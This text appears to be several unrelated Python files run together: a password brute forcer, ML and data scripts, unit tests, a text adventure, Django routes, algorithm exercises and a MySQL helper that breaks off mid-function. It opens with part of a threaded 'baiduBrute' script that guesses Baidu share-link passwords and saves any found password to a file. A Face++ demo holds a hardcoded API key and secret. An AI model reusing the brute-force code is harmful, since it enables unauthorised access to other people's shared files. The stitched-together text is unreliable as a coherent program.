headers=self.headers) answer = res.headers["set-cookie"] if answer: self.lock.acquire() if "BDCLND=" in answer: print "\nOK! 
password found: " + payload self.found_count += 1 f = open("./pass.txt", 'w') f.write(payload + '\n') f.close() # exit(1) else: pass self.lock.release() except: pass self._update_scan_count() self._print_progress() self._print_progress() self.lock.acquire() self.thread_count -= 1 self.lock.release() def run(self): self.start_time = time.time() for i in range(self.threads_num): t = threading.Thread(target=self._scan, name=str(i)) t.setDaemon(True) t.start() while self.thread_count > 0 and self.found_count == 0: time.sleep(0.01) if __name__ == '__main__': parser = optparse.OptionParser('usage: %prog [options] target') parser.add_option('-t', '--threads', dest='threads_num', default=10, type='int', help='Number of threads. default = 30') parser.add_option('-o', '--output', dest='output', default=None, type='string', help='Output file name. default is {target}.txt') (options, args) = parser.parse_args() if len(args) < 1: parser.print_help() sys.exit(0) d = baiduBrute(target=args[0], threads_num=options.threads_num, ) d.run()
#!/usr/bin/env python
# coding: utf-8

# In[42]:


def checksublist(lst, sublist):
    """Print "It's a Match" if every element of ``sublist`` occurs in
    ``lst``, otherwise print "It's Gone".

    BUG FIX: the original condition ``if(all (x in sublist) for x in lst):``
    was a generator expression, which is always truthy, so the vote counters
    never reflected membership. Assuming the intent (per the function name)
    was "is sublist contained in lst", the check is now a direct
    all()-membership test -- confirm against the original author's intent.
    """
    if all(x in lst for x in sublist):
        print("It's a Match")
    else:
        print("It's Gone")


sublist = [1, 1, 5]
lst = [1, 5, 6, 4, 1, 2, 3, 5]
checksublist(lst, sublist)


# In[40]:


lst1 = [1, 5, 6, 5, 1, 2, 3, 6]


# In[41]:


checksublist(lst1, sublist)


# In[ ]:
# SPDX-License-Identifier: Apache-2.0 """ keras2onnx This package converts keras models into ONNX for use with any inference engine supporting ONNX """ __version__ = "1.9.0" __author__ = "Microsoft Corporation" __producer__ = "keras2onnx" __producer_version__ = __version__ __domain__ = "onnxmltools" __model_version__ = 0 try: import sys import os.path from os.path import dirname, abspath import tensorflow from distutils.version import StrictVersion if StrictVersion(tensorflow.__version__.split('-')[0]) >= StrictVersion('2.0.0'): tensorflow.compat.v1.disable_tensor_equality() except ImportError: raise AssertionError('Please conda install / pip install tensorflow or tensorflow-gpu before the model conversion.') from .proto import save_model from .common import Variable, cvtfunc, set_logger_level from .funcbook import set_converter, set_converters from .main import convert_keras from .main import export_tf_frozen_graph from .main import build_io_names_tf2onnx def tfname_to_onnx(name): return Variable.tfname_to_onnx(name)
# -*- coding: utf-8 -*-
"""
Created on Thu Jun 29 00:19:15 2017

@author: l96
"""

import pandas as pd
import numpy as np
import os
import zipfile

root_dir = r'tickerData'
filename_pool = os.listdir(root_dir)


def write_dict_to_hdf_and_zip(ticker_dict, hdf_filename, compress=True):
    """Write a {ticker: DataFrame} dict to an HDF5 store and optionally zip it.

    The .zip archive shares the .h5 file's base name.
    """
    with pd.HDFStore(hdf_filename, 'w') as f:
        # BUG FIX: this loop previously iterated the module-level global
        # ``data_dict`` instead of the ``ticker_dict`` parameter, silently
        # ignoring the caller's argument.
        for ticker_name, ticker_df in ticker_dict.items():
            f[ticker_name] = ticker_df
    if compress:
        temp = list(os.path.splitext(hdf_filename))
        zip_filename = temp[0] + r'.zip'
        with zipfile.ZipFile(zip_filename, 'w', compression=zipfile.ZIP_DEFLATED) as f:
            f.write(hdf_filename)


def read_hdf_or_zip_to_dict(filename):
    """Read an HDF5 store (or a zip that contains one) back into a dict.

    NOTE(review): the .zip branch opens ``z.namelist()[0]`` as a filesystem
    path -- nothing is extracted here, so it only works if the archived .h5
    also exists on disk next to the script. Confirm intended behaviour.
    """
    temp = os.path.splitext(filename)
    returned = {}
    if temp[-1] == '.zip':
        with zipfile.ZipFile(filename, 'r') as z:
            with pd.HDFStore(z.namelist()[0], 'r') as hdf:
                for key in hdf.keys():
                    # Keys in the .h5 store start with '/'; strip it.
                    returned[key[1:]] = hdf.get(key)
    else:
        with pd.HDFStore(filename, 'r') as hdf:
            for key in hdf.keys():
                # Keys in the .h5 store start with '/'; strip it.
                returned[key[1:]] = hdf.get(key)
    return returned


#%% Load data
data_dict = {}
for filename in filename_pool:
    dot_position = filename.find('.')
    ticker = filename[:dot_position]
    print(ticker)
    temp_df = pd.read_csv(os.path.join(root_dir, filename), parse_dates=['DATE'])
    data_dict[ticker] = temp_df

if False:
    write_dict_to_hdf_and_zip(data_dict, 'data.h5')
# -*- coding: utf-8 -*- """ Created on Mon Apr 15 11:01:47 2019 @author: Eduardo Berg """ import wfdb import numpy as np import pandas as pd import matplotlib.pyplot as plt import scipy.io import os import json import scipy.signal as sig import pywt import sklearn as sk from sklearn.ensemble import RandomForestClassifier from sklearn.model_selection import cross_validate from PIL import Image import h5py with h5py.File('X.hdf5', 'r') as hf1: X = hf1['X'][:] with h5py.File('Ybin.hdf5', 'r') as hf2: Y = hf2['Y'][:] model = RandomForestClassifier(class_weight="balanced") print("start training") scores = cross_validate(model, X, Y, cv=3, return_train_score=True) print(scores)
from setuptools import setup

setup(
    name='bitmapper',
    version="0.4",
    py_modules=['bitmapper'],
    install_requires=['click', 'Pillow', 'qrcode'],
    # BUG FIX: the entry-point group was misspelled "console_scrips", so
    # setuptools never installed the ``bitmapper`` command; the group must
    # be spelled "console_scripts".
    entry_points='''
        [console_scripts]
        bitmapper=bitmapper:convert
    ''',
)
import unittest
import main
import pprint
from datetime import datetime
import csv


class TestStringMethods(unittest.TestCase):
    """Tests for main.analyze_taxable_sales, which matches sales against
    prior buy lots and reports the per-lot gain. Fixtures live in test/."""

    def test_1_basic_case(self):
        # One sale drawn from two buy lots; the second lot was bought
        # cheaper, so only it shows a gain.
        result = main.analyze_taxable_sales('test/1.csv')
        self.assertEqual(len(result), 2)
        self.assertEqual(result[0]['gain'], 0)
        self.assertEqual(result[1]['gain'], 50.0)
        self.assertEqual(result[0], {'amount': 10.0, 'buy_price': 10.0, 'currency': 'LTC', 'buy_date': datetime(2017, 1, 1, 0, 0), 'sell_date': datetime(2017, 1, 3, 0, 0), 'gain': 0.0, 'sell_price': 10.0})
        self.assertEqual(result[1], {'amount': 10.0, 'buy_price': 5.0, 'currency': 'LTC', 'buy_date': datetime(2017, 1, 2, 0, 0), 'sell_date': datetime(2017, 1, 3, 0, 0), 'gain': 50.0, 'sell_price': 10.0})

    def test_2_two_entries(self):
        # Multiple sales produce three taxable lot records.
        result = main.analyze_taxable_sales('test/2.csv')
        self.assertEqual(len(result), 3)
        self.assertEqual(result[0]['gain'], 100.00)
        self.assertEqual(result[0]['amount'], 10)
        self.assertEqual(result[0]['buy_price'], 10.0)
        self.assertEqual(result[0]['sell_price'], 20.0)
        self.assertEqual(result[1]['gain'], 75.00)
        self.assertEqual(result[2]['gain'], 125.00)

    def test_3_test_losses(self):
        # Selling below the buy price yields a negative gain (a loss).
        result = main.analyze_taxable_sales('test/3.csv')
        self.assertEqual(len(result), 2)
        self.assertEqual(result[0]['gain'], -50.00)
        self.assertEqual(result[0]['amount'], 10)
        self.assertEqual(result[0]['buy_price'], 10.0)
        self.assertEqual(result[0]['sell_price'], 5.0)
        self.assertEqual(result[1]['gain'], 0.00)

    def test_4_other_currencies(self):
        # Lots in different currencies are matched independently.
        result = main.analyze_taxable_sales('test/4.csv')
        self.assertEqual(len(result), 2)
        self.assertEqual(result[0]['gain'], 50.00)
        self.assertEqual(result[0]['amount'], 10)
        self.assertEqual(result[0]['buy_price'], 10.0)
        self.assertEqual(result[0]['sell_price'], 15.0)
        self.assertEqual(result[1]['gain'], 100.00)

    def test_5_basis(self):
        # NOTE(review): this reads test/4.csv, the same fixture as test_4,
        # and asserts the same values -- probably meant test/5.csv; confirm.
        result = main.analyze_taxable_sales('test/4.csv')
        self.assertEqual(len(result), 2)
        self.assertEqual(result[0]['gain'], 50.00)
        self.assertEqual(result[0]['amount'], 10)
        self.assertEqual(result[0]['buy_price'], 10.0)
        self.assertEqual(result[0]['sell_price'], 15.0)
        self.assertEqual(result[1]['gain'], 100.00)

    def test_6(self):
        result = main.analyze_taxable_sales('test/6.csv')
        self.assertEqual(len(result), 2)
        self.assertEqual(result[0]['gain'], 0)
        self.assertEqual(result[1]['gain'], 50.0)


if __name__ == '__main__':
    unittest.main()
import os
from random import randint


def branch1():
    """Wake-up scene. Returns True to continue the story, False to end it."""
    print('You are startled awake...', end='')
    input()
    print('You look around the room and see a door and a window.')
    print('Do you want to walk out through the (d)oor or\nclimb out of the (w)indow?')
    choice = input('Your choice:')
    if choice == 'd':
        print('You walk through the door and are greeted by adoring fans!')
        print('You must be a rock star or something...', end='')
        input()
        return True
    elif choice == 'w':
        print('You forgot you were on the 40th story of your hotel...')
        print('As you fall, you wonder if this is what it feels like to')
        print('be a sperm whale...', end='')
        input()
        return False
    elif choice == 'stop':
        print('You didn\'t say the magic word...', end='')
        input()
        return False
    elif choice == 'quit':
        print('Quitters never win and winners never quit!')
        input()
        return False
    else:
        print('Tired...Confused...you go back to sleep...', end='')
        input()
        # BUG FIX: this was a bare ``False`` expression with no ``return``,
        # so the function fell through and returned None.
        return False


def branch2():
    """Fan-encounter scene. Returns True to continue, False to end."""
    print('One of your fans comes up to you with their hand inside')
    print('their coat. It might be a gun or a knife!')
    print('Do you want to (p)unch the fan or (h)ug the fan?')
    choice = input('Your choice:')
    if choice == 'p':
        print('You take a wild swing at the fan, but instead of hitting')
        print('the fan, you hit the very large, burly, man next to them.')
        print("He doesn't look pleased...")
        input()
        return False
    elif choice == 'h':
        print('You open your arms wide to hug the fan. They suddenly pull')
        print('out a rubber chicken and offer it to you. That\'s strange...')
        input()
        return True
    else:
        print('By doing nothing, you have accepted your fate.')
        print('The adoring fan grips you in a massive bear hug.')
        print('As you drift out of consciousness, you wonder if')
        print('this could have been prevented in some way...')
        return False


def branch3():
    """Security-guard scene. Returns True to continue, False to end."""
    print('Before you get a chance to do anything, a security')
    print('guard rushes from out of nowhere and grabs the rubber')
    print('chicken out of the fan\'s hand.')
    print('Do you want to (c)ommend the security guard, or')
    print('(s)cold the security guard?')
    choice = input('Your choice:')
    print()
    if choice == 'c':
        print('After telling the guard thank you and shaking her hand,')
        print('you are lauded in the press for being such a great and')
        print('down to earth celebrity. Everyone buys your next album')
        print('and you go down in history as the best rock star in the')
        print('history of mankind...')
        input()
        return True
    if choice == 's':
        print('After scolding the guard, security guards refuse to')
        print('work for you anymore. Without security, all of your')
        print('upcoming tour dates are cancelled. Without the world')
        print('tour, your album sales plummet and your fans all start')
        print('talking about you as a one-hit wonder.')
        print('You can\'t help but wonder if this could have been prevented')
        print('somehow...')
        input()
        return False
    else:
        print('Your security detail sees your inaction as non support.')
        print('They go on strike. Without security, all of your')
        print('upcoming tour dates are cancelled. Without the world')
        print('tour, your album sales plummet and your fans all start')
        print('talking about you as a one-hit wonder.')
        print('You can\'t help but wonder if this could have been prevented')
        print('somehow...')
        input()
        return False


def branch4():
    """ATM scene: five attempts to guess a random 4-digit PIN."""
    print('You need to withdraw some money from the ATM.')
    print('Due to your stardom, there is plenty of cash in your')
    print(' account, now if only you could remember your pin...')
    tries = 0
    pin = str(randint(1000, 9999))
    while tries < 5:
        guess = input('Enter your 4 digit security pin ({} tries left):'.format(5 - tries))
        if guess == pin:
            print('That was it! You withdraw $1,000,000 and head to the mall.')
            input()
            return True
        else:
            print('That didn\'t work...')
            tries += 1
    # BUG FIX: the original used a comma ("...It was {}',format(pin)"),
    # passing two arguments to print instead of formatting, so the literal
    # "{}" was printed; use str.format so the PIN is substituted.
    print('You suddenly remember your PIN! It was {}'.format(pin))
    print('Unfortunately, you have locked yourself out of your account')
    print('for 24 hours. Unable to access your fortune,')
    print('you withdraw from society, wallow in self-pity,')
    print('and go to bed without eating dessert.')
    input()
    return False


def end():
    """Closing scene shown after all branches succeed."""
    input('You are startled awake...')
    input('woah deja vu...')
    print('You were dreaming about something, but can\'t seem')
    print('to remember what. Oh well, you feel well rested')
    print('and ready to start your day. You have an audition')
    print('in an hour, you better hurry up!')


def main():
    """Game loop: restart from the top whenever a branch returns False."""
    while True:
        # Clear the screen portably (Windows vs POSIX).
        if os.name == 'nt':
            os.system('cls')
        else:
            os.system('clear')
        if not branch1():
            continue
        print()
        if not branch2():
            continue
        print()
        if not branch3():
            continue
        print()
        if not branch4():
            continue
        print()
        end()
        break


if __name__ == '__main__':
    main()
from django.conf.urls import url
from django.urls import path
from .views import ClaimsView
from .views import PostExample
from .views import MessagesView
from .views import AddMessageView
from .views import AddChatSessionView
from .views import ChatSessionView
from .views import AddLikeView
from django.conf.urls.static import static
from django.conf import settings

# URL routes for the claims/messages/chat-session API.
# NOTE(review): every route shares the name "claims-all"; Django's
# reverse()/{% url %} will only ever resolve the last registration, so each
# route should get a unique name -- confirm nothing relies on the duplicates.
urlpatterns = [
    path('claims/', ClaimsView.as_view(), name="claims-all"),
    path('addclaim/', PostExample.as_view(), name="claims-all"),
    path('messages/', MessagesView.as_view(), name="claims-all"),
    path('addmessage/', AddMessageView.as_view(), name="claims-all"),
    path('addsession/', AddChatSessionView.as_view(), name="claims-all"),
    path('chatsessions/', ChatSessionView.as_view(), name="claims-all"),
    path('addlike/', AddLikeView.as_view(), name="claims-all"),
]
#!/usr/bin/env python2 # -*- coding: utf-8 - # You need to register your App first, and enter you API key/secret. # 您需要先注册一个App,并将得到的API key和API secret写在这里。 API_KEY = 'adfcb141240655a7f1df49972c38ffe3' API_SECRET = 'jDfByUXW5cm2HH6_6pRooDQe37t63r4t' # Import system libraries and define helper functions # 导入系统库并定义辅助函数 import time import cv2 import cv2.cv as cv from pprint import pformat def print_result(hint, result): def encode(obj): if type(obj) is unicode: return obj.encode('utf-8') if type(obj) is dict: return {encode(k): encode(v) for (k, v) in obj.iteritems()} if type(obj) is list: return [encode(i) for i in obj] return obj print hint result = encode(result) print '\n'.join([' ' + i for i in pformat(result, width = 75).split('\n')]) # First import the API class from the SDK # 首先,导入SDK中的API类 from facepp import API from facepp import File def repeat(): x= cv2.imread('1.jpg') cv2.imshow('image',x) #x = cv2.resize(np.asarray(cv.GetMat(frame))[y:y+h,x:x+w],(282,282), interpolation=cv2.INTER_LINEAR) api = API(API_KEY, API_SECRET) #cv.NamedWindow("W1",cv.CV_WINDOW_NORMAL) #cv.ResizeWindow("W1", 600, 600) #cv2.destroyAllWindows() while True: cv2.namedWindow("the window") x= cv2.imread('1.jpg') cv2.imshow('image',x) k = cv2.waitKey(0) # result = api.recognition.recognize(img = File(r'findface.jpe'), group_name = 'test') # print_result('Recognize result:123123', result) # print '=' * 60 # print 'The person with highest confidence:', \ # result['face'][0]['candidate'][0]['person_name']
# coding=utf-8
# Copyright 2022 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

"""Unit tests for adult_optimizer.py."""

from absl.testing import parameterized
from unittest import mock

from optimizers_builtin import adult_optimizer
from test_data import requests_bodies
from util import app_util


# Point the optimizer at the test GPC string->ID mapping config files
# instead of the production ones.
@mock.patch(
    'optimizers_builtin.adult_optimizer._GPC_STRING_TO_ID_MAPPING_CONFIG_FILE_NAME',
    'gpc_string_to_id_mapping_{}_test')
class AdultOptimizerTest(parameterized.TestCase):
  """Covers when AdultOptimizer forces adult=True and when it must not."""

  def setUp(self) -> None:
    super(AdultOptimizerTest, self).setUp()
    app_util.setup_test_app()
    self.optimizer = adult_optimizer.AdultOptimizer()

  # Adult-flagged product types must force adult=True even when the feed
  # explicitly set adult=False.
  @parameterized.named_parameters([{
      'testcase_name': 'Idol Category',
      'is_adult': False,
      'test_product_types': ['CD・DVD, Blu-ray', 'アイドル', 'その他'],
  }, {
      'testcase_name': 'Alcohol Category',
      'is_adult': False,
      'test_product_types': [
          'ビール・洋酒', 'リキュール', 'ハーブ・スパイス・ティー系', 'その他'
      ],
  }])
  def test_adult_optimizer_sets_adult_to_true_if_product_type_is_adult(
      self, is_adult, test_product_types):
    original_data = requests_bodies.build_request_body(
        properties_to_be_updated={
            'adult': is_adult,
            'productTypes': test_product_types
        })
    optimized_data, optimization_result = self.optimizer.process(
        original_data, 'test')
    product = optimized_data['entries'][0]['product']
    self.assertEqual(True, product['adult'])
    self.assertEqual(1, optimization_result.num_of_products_optimized)

  # Same as above, but the feed omitted the adult attribute entirely.
  @parameterized.named_parameters([{
      'testcase_name': 'Adult Not Set',
      'test_product_types': ['CD・DVD, Blu-ray', 'アイドル', 'その他'],
  }])
  def test_adult_optimizer_sets_adult_to_true_if_product_type_is_adult_and_adult_not_set(
      self, test_product_types):
    original_data = requests_bodies.build_request_body(
        properties_to_be_updated={'productTypes': test_product_types})
    optimized_data, optimization_result = self.optimizer.process(
        original_data, 'test')
    product = optimized_data['entries'][0]['product']
    self.assertEqual(True, product['adult'])
    self.assertEqual(1, optimization_result.num_of_products_optimized)

  # Always-adult GPCs need no token match in the title ("wildcard").
  @parameterized.named_parameters([{
      'testcase_name': 'Adult GPC',
      'test_google_product_category': '成人向け',
      'test_title': 'No suspicious tokens',
  }, {
      'testcase_name': 'Another Adult GPC',
      'test_google_product_category': '成人向け > アダルト > アダルト雑誌',
      'test_title': 'No suspicious tokens',
  }])
  def test_adult_optimizer_sets_adult_to_true_if_gpc_is_adult_and_tokens_are_wildcard(
      self, test_google_product_category, test_title):
    original_data = requests_bodies.build_request_body(
        properties_to_be_updated={
            'title': test_title,
            'googleProductCategory': test_google_product_category
        })
    optimized_data, optimization_result = self.optimizer.process(
        original_data, 'test')
    product = optimized_data['entries'][0]['product']
    self.assertEqual(True, product['adult'])
    self.assertEqual(1, optimization_result.num_of_products_optimized)

  # GPC supplied as a numeric category ID instead of a string path.
  @parameterized.named_parameters([{
      'testcase_name': 'Adult GPC as ID',
      'test_google_product_category': 772,
      'test_title': 'No suspicious tokens',
  }, {
      'testcase_name': 'Another Adult GPC as ID',
      'test_google_product_category': 4060,
      'test_title': 'No suspicious tokens',
  }])
  def test_adult_optimizer_sets_adult_to_true_if_gpc_is_adult_as_an_id_number(
      self, test_google_product_category, test_title):
    original_data = requests_bodies.build_request_body(
        properties_to_be_updated={
            'title': test_title,
            'googleProductCategory': test_google_product_category
        })
    optimized_data, optimization_result = self.optimizer.process(
        original_data, 'ja')
    product = optimized_data['entries'][0]['product']
    self.assertEqual(True, product.get('adult', ''))
    self.assertEqual(1, optimization_result.num_of_products_optimized)

  # Adult-capable GPC plus an adult token in the title triggers the flag.
  @parameterized.named_parameters([{
      'testcase_name': 'Idol in Title',
      'test_google_product_category': 'メディア > DVD・ビデオ',
      'test_title': 'アイドル DVD',
  }, {
      'testcase_name': 'Gravure in Title',
      'test_google_product_category': 'メディア > DVD・ビデオ',
      'test_title': 'DVD グラビア',
  }])
  def test_adult_optimizer_sets_adult_to_true_if_gpc_and_title_is_adult(
      self, test_google_product_category, test_title):
    original_data = requests_bodies.build_request_body(
        properties_to_be_updated={
            'title': test_title,
            'googleProductCategory': test_google_product_category
        })
    optimized_data, optimization_result = self.optimizer.process(
        original_data, 'test')
    product = optimized_data['entries'][0]['product']
    self.assertEqual(True, product['adult'])
    self.assertEqual(1, optimization_result.num_of_products_optimized)

  # Adult-capable GPC plus an adult token in the description also triggers.
  @parameterized.named_parameters([{
      'testcase_name': 'Idol in Description',
      'test_description': 'アイドル DVD',
      'test_google_product_category': 'メディア > DVD・ビデオ',
  }, {
      'testcase_name': 'Gravure in Description',
      'test_description': 'DVD グラビア',
      'test_google_product_category': 'メディア > DVD・ビデオ',
  }])
  def test_adult_optimizer_sets_adult_to_true_if_gpc_and_description_is_adult(
      self, test_google_product_category, test_description):
    original_data = requests_bodies.build_request_body(
        properties_to_be_updated={
            'description': test_description,
            'googleProductCategory': test_google_product_category
        })
    optimized_data, optimization_result = self.optimizer.process(
        original_data, 'test')
    product = optimized_data['entries'][0]['product']
    self.assertEqual(True, product['adult'])
    self.assertEqual(1, optimization_result.num_of_products_optimized)

  # Non-adult product types must be left untouched.
  @parameterized.named_parameters([{
      'testcase_name': 'Game Category',
      'is_adult': False,
      'test_product_types': [
          'テレビゲーム', 'プレイステーション4', '周辺機器'
      ],
  }])
  def test_adult_optimizer_does_nothing_if_category_is_not_adult(
      self, is_adult, test_product_types):
    original_data = requests_bodies.build_request_body(
        properties_to_be_updated={
            'adult': is_adult,
            'productTypes': test_product_types
        })
    optimized_data, optimization_result = self.optimizer.process(
        original_data, 'test')
    product = optimized_data['entries'][0]['product']
    self.assertEqual(False, product['adult'])
    self.assertEqual(0, optimization_result.num_of_products_optimized)

  # Adult-capable GPC alone is not enough: the title must contain a token.
  @parameterized.named_parameters([{
      'testcase_name': 'DVD Category',
      'is_adult': False,
      'test_google_product_category': 'メディア > DVD・ビデオ',
      'test_title': '何も怪しいことない',
  }, {
      'testcase_name': 'Books Category',
      'is_adult': False,
      'test_google_product_category': 'メディア > 書籍',
      'test_title': '何も怪しいことない',
  }])
  def test_adult_optimizer_does_nothing_if_category_is_adult_but_no_adult_tokens_in_title(
      self, is_adult, test_google_product_category, test_title):
    original_data = requests_bodies.build_request_body(
        properties_to_be_updated={
            'adult': is_adult,
            'googleProductCategory': test_google_product_category,
            'title': test_title
        })
    optimized_data, optimization_result = self.optimizer.process(
        original_data, 'test')
    product = optimized_data['entries'][0]['product']
    self.assertEqual(False, product['adult'])
    self.assertEqual(0, optimization_result.num_of_products_optimized)

  # Adult tokens in the title are ignored when the GPC is not adult-capable.
  @parameterized.named_parameters([{
      'testcase_name': 'Home Garden Category',
      'is_adult': False,
      'test_google_product_category': 'ホーム・ガーデン > キッチン・ダイニング > '
                                      '調理器具',
      'test_title': 'グラビア 器具',
  }, {
      'testcase_name': 'DIY Category',
      'is_adult': False,
      'test_google_product_category': 'DIY用品 > DIY小物類',
      'test_title': 'アイドル DIY',
  }])
  def test_adult_optimizer_does_nothing_if_adult_tokens_in_title_but_category_is_not_adult(
      self, is_adult, test_google_product_category, test_title):
    original_data = requests_bodies.build_request_body(
        properties_to_be_updated={
            'adult': is_adult,
            'googleProductCategory': test_google_product_category,
            'title': test_title
        })
    optimized_data, optimization_result = self.optimizer.process(
        original_data, 'test')
    product = optimized_data['entries'][0]['product']
    self.assertEqual(False, product['adult'])
    self.assertEqual(0, optimization_result.num_of_products_optimized)

  # Same for adult tokens in the description.
  @parameterized.named_parameters([{
      'testcase_name': 'Home Garden Category',
      'is_adult': False,
      'test_description': 'グラビア 器具',
      'test_google_product_category': 'ホーム・ガーデン > キッチン・ダイニング > '
                                      '調理器具',
  }, {
      'testcase_name': 'DIY Category',
      'is_adult': False,
      'test_description': 'アイドル DIY',
      'test_google_product_category': 'DIY用品 > DIY小物類',
  }])
  def test_adult_optimizer_does_nothing_if_adult_tokens_in_description_but_category_is_not_adult(
      self, is_adult, test_description, test_google_product_category):
    original_data = requests_bodies.build_request_body(
        properties_to_be_updated={
            'adult': is_adult,
            'description': test_description,
            'googleProductCategory': test_google_product_category
        })
    optimized_data, optimization_result = self.optimizer.process(
        original_data, 'test')
    product = optimized_data['entries'][0]['product']
    self.assertEqual(False, product['adult'])
    self.assertEqual(0, optimization_result.num_of_products_optimized)

  # Products already flagged adult are not counted as optimized again.
  @parameterized.named_parameters([{
      'testcase_name': 'Idol Category',
      'is_adult': True,
      'test_product_types': ['CD・DVD, Blu-ray', 'アイドル', 'その他'],
  }])
  def test_adult_optimizer_does_nothing_if_adult_already_set(
      self, is_adult, test_product_types):
    original_data = requests_bodies.build_request_body(
        properties_to_be_updated={
            'adult': is_adult,
            'productTypes': test_product_types
        })
    optimized_data, optimization_result = self.optimizer.process(
        original_data, 'test')
    product = optimized_data['entries'][0]['product']
    self.assertEqual(True, product['adult'])
    self.assertEqual(0, optimization_result.num_of_products_optimized)
class MinStack:
    """Stack with O(1) push, pop, top and retrieval of the current minimum.

    Each entry on the internal list is a ``(value, running_min)`` pair, where
    ``running_min`` is the smallest value on the stack at the moment the entry
    was pushed.  The previous revision kept a *sorted* list instead, which
    destroyed LIFO order (pop() removed the minimum rather than the most
    recently pushed element) and top() destructively popped the stack.
    """

    def __init__(self):
        # List of (value, minimum-so-far) pairs; top of stack is the end.
        self.stack = []

    def push(self, x: int) -> None:
        """Push x, recording the minimum of the stack including x."""
        current_min = x if not self.stack else min(x, self.stack[-1][1])
        self.stack.append((x, current_min))

    def pop(self) -> None:
        """Remove the most recently pushed element."""
        self.stack.pop()

    def top(self) -> int:
        """Return (without removing) the most recently pushed element."""
        return self.stack[-1][0]

    def getMin(self) -> int:
        """Return the smallest element currently on the stack."""
        return self.stack[-1][1]


if __name__ == "__main__":
    minStack = MinStack()
    minStack.push(-2)
    minStack.push(0)
    minStack.push(-3)
    assert minStack.getMin() == -3, "getMin() should be -3"
    minStack.pop()
    # After popping -3 the stack is [-2, 0]: top is 0, minimum is -2.
    # (The old asserts expected top() == -2 / getMin() == 0, which only held
    # because the broken implementation kept the list sorted.)
    assert minStack.top() == 0, "top() should return 0"
    assert minStack.getMin() == -2, "getMin() should be -2"
    minStack.push(15)
    minStack.push(-9)
    minStack.push(-3)
    minStack.push(5)
    minStack.push(4)
    minStack.push(-2)
    assert minStack.getMin() == -9, "getMin() should be -9"
""" Given an array of integers nums sorted in non-decreasing order, find the starting and ending position of a given target value. If target is not found in the array, return [-1, -1]. You must write an algorithm with O(log n) runtime complexity. https://leetcode.com/problems/find-first-and-last-position-of-element-in-sorted-array/description/ ---------------- I mean, the below is almost certainly not what they were hoping for, but also, I'd argue exactly how you should do it in Python, unless you want it very fast, but then why Python? """ import bisect import pytest class Solution: def searchRange(self, nums: list[int], target: int) -> list[int]: lhs_ind = bisect.bisect_left(nums, target) if len(nums) <= lhs_ind or nums[lhs_ind] != target: return [-1, -1] rhs_ind = bisect.bisect_right(nums, target, lo=lhs_ind) return [lhs_ind, rhs_ind - 1] @pytest.mark.parametrize( "nums,target,expected_result", ( ([5,7,7,8,8,10], 8, [3, 4]), # leetcode test ([5,7,7,8,8,10], 6, [-1, -1]), # leetcode test ([], 0, [-1, -1]), # leetcode test ([1], 2, [-1, -1]), # rhs bounds ([1, 2, 3], 2, [1, 1]), # single value ) ) def test(nums, target, expected_result): assert Solution().searchRange(nums, target) == expected_result
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
"""Small MySQLdb demo: count / select / insert / update / delete helpers.

Fixes over the previous revision:

* ``unionSelect`` guarded on the undefined name ``table`` and raised a
  NameError on every call; it now guards on ``userId``.
* ``insertData`` / ``updateData`` called ``connDB()`` twice, so the cursor
  belonged to a *different* connection than the one being committed; both
  now share a single connection.
* User-supplied values (search strings, ids) are passed as bound query
  parameters instead of being interpolated into the SQL text.
* Connections are closed alongside cursors, and cleanup is skipped when
  ``connDB()`` failed (previously ``finally: cursor.close()`` crashed on
  ``None``).
"""
import MySQLdb
#import pymysql
#import mysql.connector
import json

db_config = {
    'host': '127.0.0.1',
    'user': 'root',
    'passwd': '******',
    'port': 3306,
    'db': 'test',
    'charset': 'utf8'
}


def connDB():
    """Open a connection + cursor pair; return (None, None) on failure."""
    try:
        conn = MySQLdb.connect(host=db_config['host'], user=db_config['user'],
                               passwd=db_config['passwd'],
                               port=db_config['port'],
                               charset=db_config['charset'])
        conn.autocommit(True)
        curr = conn.cursor()
        curr.execute("SET NAMES %s" % db_config['charset'])
        curr.execute("USE %s" % db_config['db'])
        print("== connect db success ==")
        return conn, curr
    except MySQLdb.Error as e:
        print("Mysql Error %d: %s" % (e.args[0], e.args[1]))
        return None, None


def getCount(table=None, searchStr=None):
    """Return count(id) of `table`, optionally filtered by name LIKE.

    Returns None when `table` is missing or the query fails.
    """
    if table is None:
        return None
    conn, cursor = connDB()
    if cursor is None:
        return None
    try:
        # A table name cannot be a bound parameter; the search string can.
        if searchStr is None:
            cursor.execute('SELECT count(id) as cun FROM ' + table)
        else:
            cursor.execute(
                'SELECT count(id) as cun FROM ' + table +
                ' WHERE name LIKE %s',
                ('%' + searchStr + '%',))
        return cursor.fetchone()[0]
    except MySQLdb.Error as e:
        print("Mysql Error %d: %s" % (e.args[0], e.args[1]))
        return None
    finally:
        cursor.close()
        conn.close()


def select(table=None, searchStr=None):
    """Select users from `table` and return them as a JSON string.

    On success the payload is {'code': 200, 'users': [...]}; on error
    it carries the error code and message instead.
    """
    if table is None:
        return None
    data = {}
    conn, cursor = connDB()
    try:
        if searchStr is None:
            cursor.execute('SELECT * FROM ' + table)
        else:
            cursor.execute('SELECT * FROM ' + table + ' WHERE name LIKE %s',
                           ('%' + searchStr + '%',))
        # Deliberately fetch only the first row (demo behaviour kept).
        results = cursor.fetchmany(1)
        users = []
        for u in results:
            user = {}
            user['id'] = u[0]
            user['name'] = u[1]
            address = {
                "street": "科技园路.",
                "city": "武汉光谷",
                "country": "中国"
            }
            user['address'] = address
            users.append(user)
        data['code'] = 200
        data['users'] = users
        return json.dumps(data)
    except MySQLdb.Error as e:
        data['code'] = str(e.args[0])
        data['msg'] = str(e.args[1])
        return json.dumps(data)
    except Exception as ex:
        data['code'] = 404
        data['msg'] = str(ex)
        return json.dumps(data)
    finally:
        # connDB() may have returned (None, None); skip cleanup then.
        if cursor is not None:
            cursor.close()
            conn.close()


def unionSelect(userId=None, searchStr=None):
    """Join user with user_detail for one user id; return a JSON string."""
    # Bug fix: the old code tested the undefined name `table` here.
    if userId is None:
        return None
    conn, cursor = connDB()
    if cursor is None:
        return None
    try:
        base = ('SELECT u.`id`,u.`name`,d.`address` FROM user u '
                'inner join user_detail d on u.id = d.user_Id and u.id = %s')
        if searchStr is None:
            cursor.execute(base, (userId,))
        else:
